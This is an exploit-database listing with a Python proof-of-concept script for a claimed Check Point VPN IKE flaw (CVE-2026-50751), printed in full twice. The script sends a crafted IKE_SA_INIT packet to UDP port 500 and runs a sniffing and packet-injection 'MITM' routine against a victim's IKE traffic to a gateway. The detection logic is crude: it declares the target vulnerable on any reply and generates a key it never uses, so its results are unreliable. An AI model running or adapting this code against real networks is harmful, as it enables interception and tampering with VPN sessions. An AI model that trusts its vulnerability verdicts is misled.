📄 Check Point VPN IKE Logic Flaw_PACKETSTORM:223316

9.3 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N

Description

This is a Python script attempting to exploit a vulnerability in Check Point VPN by sending a malformed IKESAINIT packet to UDP port 500, detecting whether the target responds as an indicator of exploitability, then executing a MITM attack to intercept...

Visit Original Source

Basic Information

ID PACKETSTORM:223316

Published Jun 12, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Check Point VPN IKE Legacy Auth Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : No standalone download available |
==================================================================================================================================

[+] Summary : A Python script attempting to exploit a vulnerability in Check Point VPN (CVE-2026-50751) by sending a malformed
IKE_SA_INIT packet to UDP port 500, detecting whether the target responds
as an indicator of exploitability, then executing a MITM attack to intercept IKE packets between a victim and a VPN gateway.

[+] POC :

#!/usr/bin/env python3

import socket
import struct
import sys
import time
from scapy.all import *
from cryptography.hazmat.primitives.asymmetric import x25519
from cryptography.hazmat.primitives import serialization

class CVE202650751Exploit:
def __init__(self, target_ip, target_port=500):
self.target_ip = target_ip
self.target_port = target_port
self.sock = None
def create_ike_sa_init(self):
"""Create a fake IKE_SA_INIT package"""
ike_header = struct.pack('!BBBB I I I',
0x20,
0x20,
0x00,
0x00,
0x00000001,
0x00000000,
0x00000001
)
legacy_payload = bytes([
0x20,
0x00,
0x00, 0x04,
0x01, 0x02, 0x03, 0x04
])
return ike_header + legacy_payload
def exploit_legacy_auth(self):
"""Exploiting weak authentication from existing customers"""
print(f"[*] Targeting {self.target_ip}:{self.target_port}")
private_key = x25519.X25519PrivateKey.generate()
public_key = private_key.public_key()
packet = IP(dst=self.target_ip)/UDP(sport=random.randint(45000, 65535), dport=self.target_port)
ike_data = self.create_ike_sa_init()
print("[*] Sending malicious IKE packet...")
try:
response = sr1(packet/Raw(load=ike_data), timeout=3, verbose=0)
if response:
print("[+] Received response - Target may be vulnerable")
return True
except Exception as e:
print(f"[-] Exploit failed: {e}")
return False
def mitm_attack(self, victim_ip, vpn_gateway):
"""Man-in-the-middle attack to intercept VPN communications"""
print(f"[*] Starting MITM attack between {victim_ip} and {vpn_gateway}")
def packet_handler(pkt):
if IP in pkt and UDP in pkt:
if pkt[UDP].dport == 500 or pkt[UDP].sport == 500:
print(f"[+] Intercepted IKE packet from {pkt[IP].src}")
modified_payload = pkt[Raw].load + b'\x00\x00\x00\x01BAD'
send(IP(src=pkt[IP].dst, dst=pkt[IP].src)/
UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport)/
Raw(load=modified_payload), verbose=0)

sniff(filter=f"host {victim_ip} and host {vpn_gateway} and port 500",
prn=packet_handler, store=0)
def main():
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_ip> [victim_ip]")
sys.exit(1)
exploit = CVE202650751Exploit(sys.argv[1])

if exploit.exploit_legacy_auth():
print("\n[!] VULNERABLE - Legacy client authentication bypass possible!")
print("[!] CVE-2026-50751 exploitation successful")

if len(sys.argv) == 3:
print(f"[*] Initiating MITM attack against {sys.argv[2]}")
exploit.mitm_attack(sys.argv[2], sys.argv[1])
else:
print("\n[+] Target appears patched or not vulnerable")

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-06-12T16:34:36",
    "description": "This is a Python script attempting to exploit a vulnerability in Check Point VPN by sending a malformed IKESAINIT packet to UDP port 500, detecting whether the target responds as an indicator of exploitability, then executing a MITM attack to intercept...",
    "published": "2026-06-12T00:00:00",
    "modified": "2026-06-12T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Check Point VPN IKE Logic Flaw",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:223316",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-50751"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Check Point VPN IKE Legacy Auth Exploit                                                                          |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |\n    | # Vendor    : No standalone download available                                                                                 |\n    ==================================================================================================================================\n    \n    [+] Summary    :  A Python script attempting to exploit a vulnerability in Check Point VPN (CVE-2026-50751) by sending a malformed \n                      IKE_SA_INIT packet to UDP port 500, detecting whether the target responds \n                      as an indicator of exploitability, then executing a MITM attack to intercept IKE packets between a victim and a VPN gateway.\n    \n    \n    [+] POC        :  \n    \n    #!/usr/bin/env python3\n    \n    import socket\n    import struct\n    import sys\n    import time\n    from scapy.all import *\n    from cryptography.hazmat.primitives.asymmetric import x25519\n    from cryptography.hazmat.primitives import serialization\n    \n    class CVE202650751Exploit:\n        def __init__(self, target_ip, target_port=500):\n            self.target_ip = target_ip\n            self.target_port = target_port\n            self.sock = None\n        def create_ike_sa_init(self):\n            \"\"\"Create a fake IKE_SA_INIT package\"\"\"\n            ike_header = struct.pack('!BBBB I I I',\n                0x20,  \n                0x20,  \n                0x00, \n                0x00, \n                0x00000001,  \n                0x00000000,  \n                0x00000001   \n            )\n            legacy_payload = bytes([\n                0x20, \n                0x00,  \n                0x00, 0x04,  \n                0x01, 0x02, 0x03, 0x04  \n            ])\n            return ike_header + legacy_payload\n        def exploit_legacy_auth(self):\n            \"\"\"Exploiting weak authentication from existing customers\"\"\"\n            print(f\"[*] Targeting {self.target_ip}:{self.target_port}\")\n            private_key = x25519.X25519PrivateKey.generate()\n            public_key = private_key.public_key()\n            packet = IP(dst=self.target_ip)/UDP(sport=random.randint(45000, 65535), dport=self.target_port)\n            ike_data = self.create_ike_sa_init()\n            print(\"[*] Sending malicious IKE packet...\")\n            try:\n                response = sr1(packet/Raw(load=ike_data), timeout=3, verbose=0)\n                if response:\n                    print(\"[+] Received response - Target may be vulnerable\")\n                    return True\n            except Exception as e:\n                print(f\"[-] Exploit failed: {e}\")\n            return False\n        def mitm_attack(self, victim_ip, vpn_gateway):\n            \"\"\"Man-in-the-middle attack to intercept VPN communications\"\"\"\n            print(f\"[*] Starting MITM attack between {victim_ip} and {vpn_gateway}\")\n            def packet_handler(pkt):\n                if IP in pkt and UDP in pkt:\n                    if pkt[UDP].dport == 500 or pkt[UDP].sport == 500:\n                        print(f\"[+] Intercepted IKE packet from {pkt[IP].src}\")\n                        modified_payload = pkt[Raw].load + b'\\x00\\x00\\x00\\x01BAD'\n                        send(IP(src=pkt[IP].dst, dst=pkt[IP].src)/\n                             UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport)/\n                             Raw(load=modified_payload), verbose=0)\n            \n            sniff(filter=f\"host {victim_ip} and host {vpn_gateway} and port 500\", \n                  prn=packet_handler, store=0)\n    def main():\n        if len(sys.argv) < 2:\n            print(f\"Usage: {sys.argv[0]} <target_ip> [victim_ip]\")\n            sys.exit(1)\n        exploit = CVE202650751Exploit(sys.argv[1])\n        \n        if exploit.exploit_legacy_auth():\n            print(\"\\n[!] VULNERABLE - Legacy client authentication bypass possible!\")\n            print(\"[!] CVE-2026-50751 exploitation successful\")\n            \n            if len(sys.argv) == 3:\n                print(f\"[*] Initiating MITM attack against {sys.argv[2]}\")\n                exploit.mitm_attack(sys.argv[2], sys.argv[1])\n        else:\n            print(\"\\n[+] Target appears patched or not vulnerable\")\n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/223316",
    "cvss": {
        "score": 9.3,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/223316/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply